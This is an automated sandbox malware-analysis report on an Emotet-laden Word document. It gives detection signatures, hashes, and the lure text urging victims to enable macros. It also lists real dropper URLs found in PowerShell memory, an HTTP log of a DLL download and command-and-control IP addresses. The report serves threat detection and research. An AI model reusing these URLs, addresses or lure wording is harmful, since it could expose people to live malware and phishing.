Analysis Report ARCH_25_012021.doc

Overview

General Information

Sample Name:	ARCH_25_012021.doc
Analysis ID:	344718
MD5:	baedc37e68b58765fa52c73d0fd2c2d5
SHA1:	2131d1319b5de532638d34f1e3bf68337b6099bf
SHA256:	94485b3ce47d4a2df6dba8e888ca7a360763f7edd5a0448552d1d06b6e4f4baa
Most interesting Screenshot:

Detection

Emotet

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

System process connects to network (likely due to code injection or exploit)

Yara detected Emotet

Creates processes via WMI

Document contains an embedded VBA with many GOTO operations indicating source code obfuscation

Encrypted powershell cmdline option found

Hides that the sample has been downloaded from the Internet (zone.identifier)

Machine Learning detection for dropped file

Obfuscated command line found

Potential dropper URLs found in powershell memory

Powershell drops PE file

Sigma detected: Suspicious Call by Ordinal

Sigma detected: Suspicious Encoded PowerShell Command Line

Suspicious powershell command line found

Very long command line found

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Antivirus or Machine Learning detection for unpacked file

Contains functionality to read the PEB

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Document contains an embedded VBA macro which executes code when the document is opened / closed

Document contains embedded VBA macros

Downloads executable code via HTTP

Dropped file seen in connection with other malware

Drops PE files

Drops PE files to the windows directory (C:\Windows)

Enables debug privileges

Found dropped PE file which has not been started or loaded

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE file contains strange resources

Potential document exploit detected (performs DNS queries)

Potential document exploit detected (performs HTTP gets)

Potential document exploit detected (unknown TCP traffic)

Queries the volume information (name, serial number etc) of a device

Uses Microsoft's Enhanced Cryptographic Provider

Uses code obfuscation techniques (call, push, ret)

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

Signatures

AV Detection:

Antivirus detection for URL or domain

Source: http://3musketeersent.net/wp-includes/TUgD/	Avira URL Cloud: Label: malware
Source: http://dashudance.com/thinkphp/dgs7Jm9/	Avira URL Cloud: Label: malware
Source: http://shannared.com/content/lhALeS/	Avira URL Cloud: Label: malware
Source: http://mmrincs.com/eternal-duelist-9cuqv/jxGQj/	Avira URL Cloud: Label: malware
Source: http://leopardcranes.com/zynq-linux-yaayf/w/	Avira URL Cloud: Label: malware

Multi AV Scanner detection for domain / URL

Source: http://3musketeersent.net/wp-includes/TUgD/	Virustotal: Detection: 8%	Perma Link
Source: https://skilmu.com/wp-admin/hQVlB8b/	Virustotal: Detection: 10%	Perma Link
Source: http://jeevanlic.com/wp-content/r8M/	Virustotal: Detection: 14%	Perma Link
Source: http://dashudance.com/thinkphp/dgs7Jm9/	Virustotal: Detection: 14%	Perma Link

Multi AV Scanner detection for dropped file

Source: C:\Users\user\Kaktksw\An6othh\N49I.dll

ReversingLabs: Detection: 54%

Multi AV Scanner detection for submitted file

Source: ARCH_25_012021.doc	Virustotal: Detection: 16%			Perma Link
Source: ARCH_25_012021.doc	ReversingLabs: Detection: 26%

Machine Learning detection for dropped file

Source: C:\Users\user\Kaktksw\An6othh\N49I.dll

Joe Sandbox ML: detected

Antivirus or Machine Learning detection for unpacked file

Source: 12.2.rundll32.exe.240000.0.unpack	Avira: Label: TR/ATRAPS.Gen
Source: 8.2.rundll32.exe.740000.1.unpack	Avira: Label: TR/ATRAPS.Gen

Cryptography:

Uses Microsoft's Enhanced Cryptographic Provider

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 16_2_0028CC2A CryptDecodeObjectEx,

16_2_0028CC2A

Compliance:

Uses new MSVCR Dlls

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Binary contains paths to debug symbols

Source:	Binary string: System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2090409457.0000000002DC7000.00000004.00000040.sdmp
Source:	Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdbCom source: powershell.exe, 00000005.00000002.2090409457.0000000002DC7000.00000004.00000040.sdmp
Source:	Binary string: C:\Windows\dll\System.Management.Automation.pdbProg source: powershell.exe, 00000005.00000002.2090409457.0000000002DC7000.00000004.00000040.sdmp
Source:	Binary string: C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2090409457.0000000002DC7000.00000004.00000040.sdmp
Source:	Binary string: ws\System.Management.Automation.pdbpdbion.pdbERSP source: powershell.exe, 00000005.00000002.2090409457.0000000002DC7000.00000004.00000040.sdmp
Source:	Binary string: C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2090409457.0000000002DC7000.00000004.00000040.sdmp
Source:	Binary string: mscorrc.pdb source: powershell.exe, 00000005.00000002.2090288416.0000000002930000.00000002.00000001.sdmp

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini	Jump to behavior

Software Vulnerabilities:

Potential document exploit detected (performs DNS queries)

Source: global traffic

DNS query: name: shannared.com

Potential document exploit detected (performs HTTP gets)

Source: global traffic

TCP traffic: 192.168.2.22:49165 -> 192.169.223.13:80

Potential document exploit detected (unknown TCP traffic)

Source: global traffic

TCP traffic: 192.168.2.22:49165 -> 192.169.223.13:80

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Source: Traffic	Snort IDS: 2404344 ET CNC Feodo Tracker Reported CnC Server TCP group 23 192.168.2.22:49166 -> 84.232.229.24:80
Source: Traffic	Snort IDS: 2404334 ET CNC Feodo Tracker Reported CnC Server TCP group 18 192.168.2.22:49167 -> 51.255.203.164:8080
Source: Traffic	Snort IDS: 2404328 ET CNC Feodo Tracker Reported CnC Server TCP group 15 192.168.2.22:49169 -> 217.160.169.110:8080
Source: Traffic	Snort IDS: 2404314 ET CNC Feodo Tracker Reported CnC Server TCP group 8 192.168.2.22:49171 -> 185.183.16.47:80

Potential dropper URLs found in powershell memory

Source: powershell.exe, 00000005.00000002.2095364139.0000000003BDA000.00000004.00000001.sdmp

String found in memory: http://shannared.com/content/lhALeS/!http://jeevanlic.com/wp-content/r8M/!http://dashudance.com/thinkphp/dgs7Jm9/!http://leopardcranes.com/zynq-linux-yaayf/w/!http://mmrincs.com/eternal-duelist-9cuqv/jxGQj/!http://3musketeersent.net/wp-includes/TUgD/!https://skilmu.com/wp-admin/hQVlB8b/

Detected TCP or UDP traffic on non-standard ports

Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 51.255.203.164:8080
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 217.160.169.110:8080

Downloads executable code via HTTP

Source: global traffic

HTTP traffic detected: HTTP/1.1 200 OKCache-Control: no-cache, must-revalidatePragma: no-cacheExpires: Tue, 26 Jan 2021 23:10:16 GMTContent-Disposition: attachment; filename="O9TGnKaUCw.dll"Content-Transfer-Encoding: binarySet-Cookie: 6010a158c3613=1611702616; expires=Tue, 26-Jan-2021 23:11:16 GMT; Max-Age=60; path=/Last-Modified: Tue, 26 Jan 2021 23:10:16 GMTX-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffContent-Type: application/octet-streamX-Cacheable: YES:ForcedContent-Length: 631808Accept-Ranges: bytesDate: Tue, 26 Jan 2021 23:10:16 GMTAge: 0Vary: User-AgentX-Cache: uncachedX-Cache-Hit: MISSX-Backend: all_requestsData Raw: 4d 5a 50 00 02 00 00 00 04 00 0f 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 ba 10 00 0e 1f b4 09 cd 21 b8 01 4c cd 21 90 90 54 68 69 73 20 70 72 6f 67 72 61 6d 20 6d 75 73 74 20 62 65 20 72 75 6e 20 75 6e 64 65 72 20 57 69 6e 33 32 0d 0a 24 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 19 5e 42 2a 00 00 00 00 00 00 00 00 e0 00 8e a1 0b 01 02 19 00 30 06 00 00 70 03 00 00 00 00 00 bc 3e 06 00 00 10 00 00 00 40 06 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 e0 09 00 00 04 00 00 00 00 00 00 02 00 01 00 00 00 00 00 00 00 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 70 06 00 ec 22 00 00 00 10 07 00 00 c6 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 06 00 d4 6e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 43 4f 44 45 00 00 00 00 e8 2e 06 00 00 10 00 00 00 30 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 44 41 54 41 00 00 00 00 cc 14 00 00 00 40 06 00 00 16 00 00 00 34 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 42 53 53 00 00 00 00 00 d1 0c 00 00 00 60 06 00 00 00 00 00 00 4a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 69 64 61 74 61 00 00 ec 22 00 00 00 70 06 00 00 24 00 00 00 4a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 65 6c 6f 63 00 00 d4 6e 00 00 00 a0 Data Ascii: MZP@!L!This program must be run under Win32$7PEL^B*

HTTP GET or POST without a user agent

Source: global traffic

HTTP traffic detected: GET /content/lhALeS/ HTTP/1.1Host: shannared.comConnection: Keep-Alive

IP address seen in connection with other malware

Source: Joe Sandbox View	IP Address: 84.232.229.24 84.232.229.24
Source: Joe Sandbox View	IP Address: 192.169.223.13 192.169.223.13

Internet Provider seen in connection with other malware

Source: Joe Sandbox View	ASN Name: ONEANDONE-ASBrauerstrasse48DE ONEANDONE-ASBrauerstrasse48DE
Source: Joe Sandbox View	ASN Name: OVHFR OVHFR
Source: Joe Sandbox View	ASN Name: RCS-RDS73-75DrStaicoviciRO RCS-RDS73-75DrStaicoviciRO
Source: Joe Sandbox View	ASN Name: AS-26496-GO-DADDY-COM-LLCUS AS-26496-GO-DADDY-COM-LLCUS

Source: unknown	TCP traffic detected without corresponding DNS query: 84.232.229.24
Source: unknown	TCP traffic detected without corresponding DNS query: 84.232.229.24
Source: unknown	TCP traffic detected without corresponding DNS query: 84.232.229.24
Source: unknown	TCP traffic detected without corresponding DNS query: 51.255.203.164
Source: unknown	TCP traffic detected without corresponding DNS query: 51.255.203.164
Source: unknown	TCP traffic detected without corresponding DNS query: 51.255.203.164
Source: unknown	TCP traffic detected without corresponding DNS query: 51.255.203.164
Source: unknown	TCP traffic detected without corresponding DNS query: 51.255.203.164
Source: unknown	TCP traffic detected without corresponding DNS query: 51.255.203.164
Source: unknown	TCP traffic detected without corresponding DNS query: 217.160.169.110
Source: unknown	TCP traffic detected without corresponding DNS query: 217.160.169.110
Source: unknown	TCP traffic detected without corresponding DNS query: 217.160.169.110
Source: unknown	TCP traffic detected without corresponding DNS query: 217.160.169.110
Source: unknown	TCP traffic detected without corresponding DNS query: 217.160.169.110
Source: unknown	TCP traffic detected without corresponding DNS query: 217.160.169.110
Source: unknown	TCP traffic detected without corresponding DNS query: 185.183.16.47
Source: unknown	TCP traffic detected without corresponding DNS query: 185.183.16.47
Source: unknown	TCP traffic detected without corresponding DNS query: 185.183.16.47
Source: unknown	TCP traffic detected without corresponding DNS query: 185.183.16.47
Source: unknown	TCP traffic detected without corresponding DNS query: 185.183.16.47
Source: unknown	TCP traffic detected without corresponding DNS query: 185.183.16.47

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{F5248432-B174-499E-B3BD-E7523F18DF93}.tmp

Jump to behavior

Source: global traffic

HTTP traffic detected: GET /content/lhALeS/ HTTP/1.1Host: shannared.comConnection: Keep-Alive

Source: rundll32.exe, 00000006.00000002.2095088979.0000000001C10000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2092610452.0000000001FD0000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2094682788.0000000001E20000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2096129935.0000000001D70000.00000002.00000001.sdmp

String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)

Source: unknown

DNS traffic detected: queries for: shannared.com

Source: powershell.exe, 00000005.00000002.2095364139.0000000003BDA000.00000004.00000001.sdmp	String found in binary or memory: http://3musketeersent.net/wp-includes/TUgD/
Source: powershell.exe, 00000005.00000002.2095364139.0000000003BDA000.00000004.00000001.sdmp	String found in binary or memory: http://dashudance.com/thinkphp/dgs7Jm9/
Source: rundll32.exe, 00000006.00000002.2095088979.0000000001C10000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2092610452.0000000001FD0000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2094682788.0000000001E20000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2096129935.0000000001D70000.00000002.00000001.sdmp	String found in binary or memory: http://investor.msn.com
Source: rundll32.exe, 00000006.00000002.2095088979.0000000001C10000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2092610452.0000000001FD0000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2094682788.0000000001E20000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2096129935.0000000001D70000.00000002.00000001.sdmp	String found in binary or memory: http://investor.msn.com/
Source: powershell.exe, 00000005.00000002.2095364139.0000000003BDA000.00000004.00000001.sdmp	String found in binary or memory: http://jeevanlic.com/wp-content/r8M/
Source: powershell.exe, 00000005.00000002.2095364139.0000000003BDA000.00000004.00000001.sdmp	String found in binary or memory: http://leopardcranes.com/zynq-linux-yaayf/w/
Source: rundll32.exe, 00000006.00000002.2096042413.0000000001DF7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2092922246.00000000021B7000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2095174145.0000000002007000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2096496954.0000000001F57000.00000002.00000001.sdmp, rundll32.exe, 0000000A.00000002.2100155586.00000000021D7000.00000002.00000001.sdmp	String found in binary or memory: http://localizability/practices/XML.asp
Source: rundll32.exe, 00000006.00000002.2096042413.0000000001DF7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2092922246.00000000021B7000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2095174145.0000000002007000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2096496954.0000000001F57000.00000002.00000001.sdmp, rundll32.exe, 0000000A.00000002.2100155586.00000000021D7000.00000002.00000001.sdmp	String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: powershell.exe, 00000005.00000002.2095364139.0000000003BDA000.00000004.00000001.sdmp	String found in binary or memory: http://mmrincs.com/eternal-duelist-9cuqv/jxGQj/
Source: powershell.exe, 00000005.00000002.2089932064.0000000002360000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2096763886.0000000002910000.00000002.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: rundll32.exe, 00000006.00000002.2096042413.0000000001DF7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2092922246.00000000021B7000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2095174145.0000000002007000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2096496954.0000000001F57000.00000002.00000001.sdmp, rundll32.exe, 0000000A.00000002.2100155586.00000000021D7000.00000002.00000001.sdmp	String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: powershell.exe, 00000005.00000002.2095818604.0000000003CE6000.00000004.00000001.sdmp	String found in binary or memory: http://shannared.com
Source: powershell.exe, 00000005.00000002.2095364139.0000000003BDA000.00000004.00000001.sdmp	String found in binary or memory: http://shannared.com/content/lhALeS/
Source: rundll32.exe, 00000006.00000002.2096042413.0000000001DF7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2092922246.00000000021B7000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2095174145.0000000002007000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2096496954.0000000001F57000.00000002.00000001.sdmp, rundll32.exe, 0000000A.00000002.2100155586.00000000021D7000.00000002.00000001.sdmp	String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: powershell.exe, 00000005.00000002.2089932064.0000000002360000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2096763886.0000000002910000.00000002.00000001.sdmp	String found in binary or memory: http://www.%s.comPA
Source: rundll32.exe, 00000006.00000002.2095088979.0000000001C10000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2092610452.0000000001FD0000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2094682788.0000000001E20000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2096129935.0000000001D70000.00000002.00000001.sdmp	String found in binary or memory: http://www.hotmail.com/oe
Source: rundll32.exe, 00000006.00000002.2096042413.0000000001DF7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2092922246.00000000021B7000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2095174145.0000000002007000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2096496954.0000000001F57000.00000002.00000001.sdmp, rundll32.exe, 0000000A.00000002.2100155586.00000000021D7000.00000002.00000001.sdmp	String found in binary or memory: http://www.icra.org/vocabulary/.
Source: rundll32.exe, 00000006.00000002.2095088979.0000000001C10000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2092610452.0000000001FD0000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2094682788.0000000001E20000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2096129935.0000000001D70000.00000002.00000001.sdmp	String found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: rundll32.exe, 00000009.00000002.2096129935.0000000001D70000.00000002.00000001.sdmp	String found in binary or memory: http://www.windows.com/pctv.
Source: powershell.exe, 00000005.00000002.2095364139.0000000003BDA000.00000004.00000001.sdmp	String found in binary or memory: https://skilmu.com/wp-admin/hQVlB8b/

E-Banking Fraud:

Yara detected Emotet

Source: Yara match	File source: 0000000F.00000002.2108207451.0000000000170000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.2102924374.0000000000660000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.2102828167.00000000001E0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2094445834.0000000000710000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2095209420.00000000001F0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2097508616.0000000000300000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2101092569.00000000002C0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.2108344528.00000000002B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.2338438182.00000000001A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.2102745390.00000000001B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2107924027.0000000000410000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2100869950.00000000001F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2091592236.00000000001F0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2107877116.00000000001D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2099763419.00000000003D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2092161485.0000000000290000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.2338503796.0000000000280000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2093577825.0000000000410000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2094474454.0000000000740000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2098058880.00000000003A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2101004097.0000000000240000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2098090844.00000000003E0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.2108318970.0000000000250000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.2338458694.00000000001D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2095115818.0000000000180000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2095854537.00000000003E0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2107894176.0000000000200000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2099872528.00000000005A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2098968815.0000000000140000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2092243778.0000000000340000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 7.2.rundll32.exe.1f0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.rundll32.exe.660000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.rundll32.exe.140000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rundll32.exe.410000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.rundll32.exe.340000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.rundll32.exe.170000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.rundll32.exe.1d0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.rundll32.exe.3e0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.rundll32.exe.2c0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rundll32.exe.740000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.rundll32.exe.240000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.rundll32.exe.3e0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.rundll32.exe.660000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.rundll32.exe.5a0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.rundll32.exe.280000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.rundll32.exe.200000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.rundll32.exe.300000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.rundll32.exe.3e0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.rundll32.exe.1f0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.rundll32.exe.1e0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.rundll32.exe.1d0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.rundll32.exe.1e0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.rundll32.exe.300000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.rundll32.exe.140000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.rundll32.exe.3e0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.rundll32.exe.170000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.rundll32.exe.250000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.rundll32.exe.240000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.rundll32.exe.280000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.rundll32.exe.410000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.rundll32.exe.410000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.rundll32.exe.1f0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rundll32.exe.740000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.rundll32.exe.5a0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.rundll32.exe.1f0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.rundll32.exe.340000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rundll32.exe.410000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.rundll32.exe.2c0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.rundll32.exe.200000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.rundll32.exe.250000.1.unpack, type: UNPACKEDPE

System Summary:

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)

Source: Screenshot number: 4	Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document. 0 Page: I of I , word
Source: Screenshot number: 4	Screenshot OCR: DOCUMENT IS PROTECTED. I Previewing is not available for protected documents. You have to press "E
Source: Screenshot number: 4	Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
Source: Screenshot number: 4	Screenshot OCR: ENABLE CONTENT" buttons to preview this document. 0 Page: I of I , words: 8,758 , C i N@m 13
Source: Screenshot number: 8	Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT buttons to preview this document. a
Source: Screenshot number: 8	Screenshot OCR: DOCUMENT IS PROTECTED. Previewing is not available for protected documents. You have to press "ENA
Source: Screenshot number: 8	Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT buttons to preview this
Source: Screenshot number: 8	Screenshot OCR: ENABLE CONTENT buttons to preview this document. a
Source: Document image extraction number: 0	Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document.
Source: Document image extraction number: 0	Screenshot OCR: DOCUMENT IS PROTECTED. Previewing is not available for protected documents. You have to press "ENA
Source: Document image extraction number: 0	Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
Source: Document image extraction number: 0	Screenshot OCR: ENABLE CONTENT" buttons to preview this document.
Source: Document image extraction number: 1	Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document.
Source: Document image extraction number: 1	Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
Source: Document image extraction number: 1	Screenshot OCR: ENABLE CONTENT" buttons to preview this document.

Powershell drops PE file

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\Kaktksw\An6othh\N49I.dll

Jump to dropped file

Very long command line found

Source: unknown	Process created: Commandline size = 5677
Source: unknown	Process created: Commandline size = 5576
Source: C:\Windows\System32\cmd.exe	Process created: Commandline size = 5576	Jump to behavior

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76E20000 page execute and read and write	Jump to behavior
